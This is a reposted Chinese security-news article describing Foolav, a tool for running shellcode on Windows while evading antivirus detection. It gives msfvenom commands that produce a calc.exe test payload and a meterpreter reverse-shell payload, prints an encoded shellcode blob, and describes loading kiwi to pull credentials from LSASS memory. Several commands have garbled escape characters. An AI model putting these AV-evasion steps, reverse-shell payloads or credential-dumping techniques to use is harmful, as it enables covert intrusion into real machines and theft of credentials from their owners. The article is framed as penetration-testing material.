转载

Foolav:免杀小工具+win主机运行任意payload

Foolav:免杀小工具+win主机运行任意payload

在渗透测试中, 当你需要执行如meterpreter等的payload,而又需要做免杀时,下面这段代码编译的exe也许会对你产生帮助。你需要做的就是上传这两个文件,同目录下的可执行exe文件和payload文件。

实验指南

1.准备好你的payload(32位系统):

calc(计算器实验版本):

msfvenom -p windows/exec CMD=calc.exe EXITFUNC=thread -ex86/shikata_ga_nai -b "/x00/x0a/x0d/xff" -f c 2>/dev/null | egrep"^/"" | tr -d "/"/n;" >foolav.mf 注意:你在这里并不需要使用编码或者避免使用敏感字符,它肯定会起作用的。

meterpreter(实战反弹shell版本):

msfvenom -p windows/meterpreter_reverse_tcp LHOST=... -ax86 -f c 2>/dev/null | egrep "^/"" | tr -d"/"/n;" >foolav.mf

2.payload文件(与exe文件重名,但后缀为mf),拷贝到与exe文件同目录,然后可以通过下面的方式启动calc.exe。

mf文件内容如下:

/xbb/x28/x30/x85/x5b/xd9/xf7/xd9/x74/x24/xf4/x5a/x2b/xc9/xb1/x33/x83/xea/xfc/x31/x5a/x0e/x03/x72/x3e/x67/xae/x7e/xd6/xee/x51/x7e/x27/x91/xd8/x9b/x16/x83/xbf/xe8/x0b/x13/xcb/xbc/xa7/xd8/x99/x54/x33/xac/x35/x5b/xf4/x1b/x60/x52/x05/xaa/xac/x38/xc5/xac/x50/x42/x1a/x0f/x68/x8d/x6f/x4e/xad/xf3/x80/x02/x66/x78/x32/xb3/x03/x3c/x8f/xb2/xc3/x4b/xaf/xcc/x66/x8b/x44/x67/x68/xdb/xf5/xfc/x22/xc3/x7e/x5a/x93/xf2/x53/xb8/xef/xbd/xd8/x0b/x9b/x3c/x09/x42/x64/x0f/x75/x09/x5b/xa0/x78/x53/x9b/x06/x63/x26/xd7/x75/x1e/x31/x2c/x04/xc4/xb4/xb1/xae/x8f/x6f/x12/x4f/x43/xe9/xd1/x43/x28/x7d/xbd/x47/xaf/x52/xb5/x73/x24/x55/x1a/xf2/x7e/x72/xbe/x5f/x24/x1b/xe7/x05/x8b/x24/xf7/xe1/x74/x81/x73/x03/x60/xb3/xd9/x49/x77/x31/x64/x34/x77/x49/x67/x16/x10/x78/xec/xf9/x67/x85/x27/xbe/x88/x67/xe2/xca/x20/x3e/x67/x77/x2d/xc1/x5d/xbb/x48/x42/x54/x43/xaf/x5a/x1d/x46/xeb/xdc/xcd/x3a/x64/x89/xf1/xe9/x85/x98/x91/x6c/x16/x40/x78/x0b/x9e/xe3/x84

3.如下图,一旦运行了可执行exe文件(foolav.exe),这里附上 下载地址 。payload文件(foolav.mf)就会被解析,导入单独线程,在内存中执行相应的功能:

Foolav:免杀小工具+win主机运行任意payload

提示

x86文件在x86和x86_64windows系统都可以运行,你可以使用x86下的payload。然而,x86的meterpreter是可以迁移到x86_64进程的。此后你如果运行:

load kiwi

它会加载x86_64版本,保证可以从 内存里 访问 LSASS进程中的敏感内容:

Foolav:免杀小工具+win主机运行任意payload

.mf文件自然是被加密混淆的,解析器会忽略除了16进制(/xHH)的其他字符。这意味着它可以把你的payload加入几乎任何文件,甚至加入你自己的评论里:

Foolav:免杀小工具+win主机运行任意payload

*参考来源: github ,FB小编dawner编译,转载请注明来自FreeBuf黑客与极客(FreeBuf.COM)    

原文  http://www.freebuf.com/tools/96970.html
正文到此结束
Loading...